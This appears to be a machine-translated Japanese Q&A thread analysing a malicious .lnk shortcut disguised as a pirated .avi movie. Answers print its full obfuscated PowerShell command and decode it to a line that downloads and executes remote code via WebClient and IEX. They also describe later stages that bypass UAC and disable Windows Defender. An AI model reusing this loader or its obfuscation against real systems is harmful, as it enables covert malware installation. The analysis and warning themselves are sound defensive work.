web-dev-qa-db-ja.com

これはマルウェアによるPowershellの呼び出しですか?

一目で.aviのファイルを取得しましたが、実際には.lnkファイルであることがわかりましたが、遅すぎました。

そして、そのファイルのターゲット要素属性はC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82です

開始点は次のとおりです:%SYSTEMROOT%\System32\WindowsPowerShell\v1.0

次のASCIIコードから文字列を作成しましたが、それはHallo World!のBASE64形式のようです。NoPrが見つからなかったので、とても混乱しているようです。 、WindおよびeXEcパラメータは、Powershellのドキュメントのどこかにあります。さらに、何らかの理由で、ファイルの説明フィールドから.avi値を削除するまで、ファイルのサイズは700MBでした。

このファイルが何をしようとするか知っていますか?

6
Yoda

これは間違いなくマルウェアです!

基本的に、これは複数のステージを持つマルウェアです。これまでのところ、私は経験しました:

ステージ1(.lnkファイル)

http://zvd.us/1 からPowerShellコードをダウンロードして実行します

ステージ2

ダウンロードしたPowerShellコードには https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1 の逐語的コピーが含まれています。これはUACバイパスのようです。次に、(管理者として)バッチファイルをダウンロードして実行します。

ステージ3

バッチファイルは、最初にすべてのWindows Defenderコンポーネント(ドライバー、スケジュールされたタスク、自動実行エントリ)を無効にしようとし、その効果にグループポリシーを追加します。次に、2つのファイルをダウンロードして実行します。ウイルスの合計リンクをファイルに投稿します。

  1. https://www.virustotal.com/#/file/29ea855339856181c2419b9573b8fd7aafb55b5d1cc0d5c9cb2648e2ef2582f7
  2. https://www.virustotal.com/#/file/6055ef00b9b5f1d7a5c05ef9649d367bab071db3736d8dca2bac67d0afe768de

1つ目は、認められたマルウェアのようです。一方、2つ目は、まだ完全に分析する必要があるNSISインストーラーです。システムのhostsファイルを独自のファイルに置き換えて、多くのドメインを80.241.222.137にリダイレクトし、ルート証明書をインストールするようです。

7
yossizahn

同じことが私のパートナーのコンピューターでも起こったので、私はこれで少し先に進みました。 LNKファイルのターゲットは、実際にはプロパティウィンドウのボックスに収まるものよりもはるかに長くなります。 linkanalyzer を使用して、ターゲット全体を取得しました。

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP  [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82 ,87, 91 , 80 ,74 ,23 , 23,16,122,81 ,73,80 ,82 , 81 , 95, 90 , 109, 74 ,76,87,80 , 89,22, 25 , 86 , 74, 74 ,78, 4, 17 ,17 , 68,72 , 92 ,16 ,75,77 ,17 ,15 ,25,23 ,5 , 119, 123 ,102 ,30, 26, 95, 77 ,78 , 70 )|fOReAch-ObjECT {[cHAr] ($_ -bXOr'0x3E')}) ) | .( $EnV:coMsPeC[4,24,25]-jOiN'')

上記のコマンドでは、|.までのすべてが数値のリストを作成し、各数値に対して何らかのバイナリXOR操作を実行してから、結果を文字列として結合します。これはコードを難読化する方法であると私は信じています。

$aspx = ((New-Object System.Net.WebClient)).DownloadString('http://zvb.us/1');IEX $aspx

次に、これが( $EnV:coMsPeC[4,24,25]-jOiN'')にパイプされます。

COMSPECはコマンドラインインタープリターですが、[4,24,25]-jOiNの部分が何をすべきかわかりません。最良の場合は、DownloadString関数のURLをダウンロードするだけです。最悪の場合、何かをダウンロードして実行します。 URLをたどる勇気がない。

全体的に見て、これはマルウェアに非常によく似ていると思いますが、powershellの経験を持つ誰かがコメントできればすばらしいと思います。

4
evilgras

@zoredacheはjistを持っているようです。バイパスモードで実行ポリシーがロードされたnoprofileを使用してウィンドウでコマンドを実行するだけです(コード署名は必要ありません)。

次の方法でテストできます(最後に3つの括弧を追加しましたが、何か不足しているように感じます)。

$value = [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82)))
Write-Host $value
2695777870303302222112917319113928491937430109717774918316112917416105919212582

そのコードが何であるかはわかりませんが、DEC ASCII文字コードを文字列に連結することが考えられていました。あなたの "Hallo World!"は、私が言えることからずれているようです。手始めに、あなたが持っている文字列にはもっとたくさんの文字があります。

http://www.asciitable.com/ は次のことを示唆しています。

SUB _ M N F RS ETX RS SYN SYN p [I DC3 q\T [] J RS m G M J [S DLE p [J DLE i Z \} R

4
duct_tape_coder

マルウェア。隠された

https://thepiratebay.rocks/torrent/26213608/Bohemian_Rhapsody_2018.720p.DVDRip.x264.DTS-1XBET

グーグル経由でこのスレッドを見つけました。これはウイルス/マルウェアなどであり、PCをねじ込む可能性があります。 PirateBayのさまざまな大きなファイルに添付され、PCにがらくたをインストールするコードを隠します。実行しないでください。すぐに削除します。これはPirateBayの「Bohemian Rhapsody 2018.avi」映画にありますが、700mgファイルは単なるスペースであり、実際にはがらくたへのシンボリックリンク/ショートカットです。プロパティタブを確認します。

C:\ Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP [stRiNG] :: join( ''、((26、95、77、78、70、30,3、 30、22、22、112、91、73、19、113、92、84、91、93、74、30、109、71、77、74、91、83、16、112、91、74、16、105、 91、92、125、82

0
Derk McGee